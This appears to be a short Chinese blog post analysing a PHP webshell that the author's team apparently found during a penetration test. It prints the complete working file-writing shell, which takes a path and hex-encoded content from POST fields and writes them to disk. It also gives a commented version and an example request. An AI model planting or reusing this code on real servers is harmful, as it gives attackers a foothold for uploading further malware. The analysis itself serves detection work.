pHp的灵活度是大家有目共睹的

pHp木马查杀的却是一大难点

下面是我们团队渗透时捡到的一枚小马

<?php $f=realpath(dirname(__FILE__)."/../").$_POST["z1"];$c=$_POST["z2"];$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));@fwrite(fopen($f,"w"),$buf); echo "1ok";?> 

格式化代码分析发给大家

z1=222.txt&z2=74657374生成 ../222.txt 内容test

<?php 
$f=realpath(dirname(__FILE__)."/../").$_POST["z1"]; //返回生成文件的路径
$c=$_POST["z2"];$buf=""; //z2获取内容到变量c中,初始化变量buf
for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2)); //计次循环,解码c提交上来的内容
@fwrite(fopen($f,"w"),$buf); echo "1ok"; //生成文件
?>